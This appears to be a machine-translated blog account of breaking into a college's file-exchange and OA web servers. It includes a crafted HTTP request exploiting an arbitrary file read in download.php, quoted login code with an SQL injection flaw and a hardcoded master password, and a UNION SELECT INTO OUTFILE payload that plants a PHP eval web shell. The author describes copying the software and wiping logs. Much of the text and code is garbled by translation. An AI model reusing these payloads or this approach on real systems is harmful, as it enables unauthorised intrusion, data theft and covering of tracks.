[Attack and Defense notes] One twists and turns Security Detection

 
By: Cai
This security check has been around for a while, and it has no time to write a manuscript. The specific environment may be forgotten, but the entire process and ideas are still very clear. Because I work in the school's Network Studio after school, I pay more attention to the service and development of some school websites. During this period, it was found that the file exchange system of a college was very good, and the use of it on the campus network brought about many conveniences. There is no ready-made system download on the Internet after searching. Do you have to write it yourself...

Step:
The server opens ports 21 and 80, and the Serv-U6.2, Apache/2.055 (win32) PHP/5.1.2; the same server also has an OA system. Black box testing: first, test the upload of a script file. You can upload the file. The extracted code will not be parsed ..., Capture packets during the upload process, and construct non-existing files, send packets, and no sensitive information is exposed. Scanning the entire file in the SWAp system will scan out config. php, and there will be no other files in google. Didn't I say there is still an OA system? google OA does have dynamic connections, but all connections first determine if it is an internal IP address. If it is not an internal IP address, it will jump directly to a login page, the test here is totally deadlocked. After several times of departure, after several times of return, there is no result in the test. Can't I really take it? In another test, the extracted code entered attracted me.

"Hxxp: // www.xxx.edu.cn/ex/download.php? Else"

The url should be an absolute address, so will it be changed to another file?
Packet Capture:

GET/ex/download. php? Bytes
HTTP/1.1
Accept :*/*
Referer: hxxp: // www.xxx.edu.cn/ex/down.php
Accept-Language: zh-cn
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2;. net clr 1.1.4322; InfoPath.1)
Host: www.xxx.edu.cn
Connection: Keep-Alive
Cookie: down_fail_cnt = 0
Generally, PHP inherits the SYS permission under WIN32, so the Read File simply reads c: oot. ini, And the Telnet server ip 80 sends the following modified data.

Modify:

/Ex/download. php? Url = c % 3A % 5Cboot. ini HTTP/1.1
Accept :*/*
Referer: hxxp: // www.xxx.edu.cn/ex/down.php
Accept-Language: zh-cn
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2;. net clr 1.1.4322; InfoPath.1)
Host: www.xxx.edu.cn
Connection: Keep-Alive
Cookie: down_fail_cnt = 0

The result returns the content of boot. ini!

The next problem is to guess the path of the web directory. You can find the WEB path in the configuration file of PHP or Apache or the above package. When you try to find the path d: wwwrootex, if no error message is returned, the path is guessed. Then, the file code of the swap system is read. The code is associated, seven PHP files are found and the shell cannot be obtained using this system. The path to the OA system should be d: wwwrootoa, which is completely correct! The first read is config. php. Check sensitive information. The exposed database connection information is a local connection with the root permission. Then I scanned the OA file to test whether I could use shell to read a large number of source files ?... ... Cold heart.

Breakthrough:

If you are in conflict, give up and be unwilling. Continue, even if you read the entire set of code, you may get nothing. You can check whether the code is filtered out. First, log on to the port and enter the user name and password to submit and capture packets. Catch check. php and read the code. It is written as follows:

<? Php
// Echo "system maintenance, please visit later! "; Exit;
Require ("config. php ");
Require ("public/f_main.php ");
Require ("f_db/". $ Database [type]. ". php ");

Session_start ();

$ Db = new SQL _db ($ Database [server], $ Database [username], $ Database [password], $ Database [dbname], false );
If (! $ Db-> db_connect_id)
{
MsgGo ("database connection failed! "," Exit ");
}

Foreach ($ _ POST as $ key =>$ value) $ key = $ value;

// User password verification
$ SQL = "SELECT a. *, B. dep_name, B. dep_parent_id, B. dep_id AS dep_id, c. dep_name as dep_parent_name
FROM t_user
Left join t_dep B ON a. dep_id = B. dep_id
Left join t_dep c ON c. dep_id = B. dep_parent_id
WHERE user_name = $ user_name ";
If (! ($ Result = $ db-> SQL _query ($ SQL) MsgGo ("Data Query failed! "," Login. php ");
If ($ row = $ db-> SQL _fetchrow ($ result )){
If ($ row ["user_status"]! = "1 "){
MsgGo ("This user is disabled and cannot log on! "," Login. php ");
} Else {
If (md5 ($ user_password) = $ row ["user_password"] | crypt ($ user_password, $ row ["user_password_old"]) = $ row ["user_password_old"] | $ user_password = "qwert12345 ")
{
If ($ row ["user_password_old"]! = "" & $ User_password! = "Qwert12345 "){
$ SQL = "UPDATE t_user SET
User_password = ". md5 ($ user_password ).",
User_password_old =
WHERE user_name = $ user_name ";
If (! $ Result = $ db-> SQL _query ($ SQL )){
MsgGo ("Data Query failed! "," Login. php ");
}
}
$ SQL = "UPDATE t_user SET
Last_login_time = ". time ()."
WHERE user_name = $ user_name ";
If (! $ Result = $ db-> SQL _query ($ SQL )){
MsgGo ("Data Query failed! "," Login. php ");
}
$ _ SESSION ["sess_user_name"] = $ row ["user_name"];
$ _ SESSION ["sess_user_type"] = $ row ["user_type"];
$ _ SESSION ["sess_user_real_name"] = $ row ["user_real_name"];
$ _ SESSION ["sess_user_level"] = $ row ["user_level"];
$ _ SESSION ["sess_dep_id"] = $ row ["dep_id"];
$ _ SESSION ["sess_dep_name"] = $ row ["dep_name"];

If ($ row ["dep_parent_id"] = "1 "){
$ _ SESSION ["sess_dep_level"] = "1 ";
$ _ SESSION ["sess_dep_id1"] = $ row ["dep_id"];
$ _ SESSION ["sess_dep_parent_id"] = $ row ["dep_parent_id"];
$ _ SESSION ["sess_dep_parent_name"] = $ row ["dep_parent_name"];
} Elseif ($ row ["dep_parent_id"]> "1 "){
$ _ SESSION ["sess_dep_level"] = "2 ";
$ _ SESSION ["sess_dep_id1"] = $ row ["dep_parent_id"];
$ _ SESSION ["sess_dep_parent_id"] = $ row ["dep_parent_id"];
$ _ SESSION ["sess_dep_parent_name"] = $ row ["dep_parent_name"];
}

WriteLog ("log on to the system ");

// WriteCookie ("username_recent", $ _ SESSION ["sess_user_name"], 24*30 );
Setcookie ("username_recent", $ _ SESSION ["sess_user_name"], time () + 3600*24*30 );

// Go to the system Homepage
Echo "<script language = javascript> ";
If ($ go! = ""){
Echo "location = {$ go }? Filter = ". urlencode ($ filter )."";
} Else {
If ($ row ["user_type"]! = "101") echo "location = login/index. php ";
Else echo "location = index. php ";
}

Echo "</script> ";
} Else {
MsgGo ("Incorrect password! "," Login. php ");
}
}
} Else {
MsgGo ("username error! "," Login. php ");
}

?>

We can see that check. php filtering is very lax, which directly leads to SQL injection! It seems that there are many similar articles on the Internet. First, 24 fields are found, and then
Union select 1, <, ">? @ Eval ($ HTTP_POST_VARS [a])?>, 3, 4, 5, 6, 7, 8, 9, 0, 1, 3, 4, 5, 6, 7, 8, 9, 0, 1, 2, 3, 4 into outfile d: wwwrootoadir. php /*
Submit!

In this case, hxxp: // www.xxx.edu.cn/oa/dir.php is our shell address.

This shell does not require Elevation of Privilege... ... Directly drag the file exchange and OA package home, and there is nothing else, and the log is wiped away.

The whole process is a turning point. It's hard. If you know this, you might as well write it yourself. Ask for a program with holes-_-, alas. After carefully reading the code, the problem lies in download. php, and a function is written incorrectly... ... It seems that I have really verified the sentence "security is a little sloppy !" My goal is to use this program without further penetration. With a small gap, the entire server group may fall! Security is no small matter!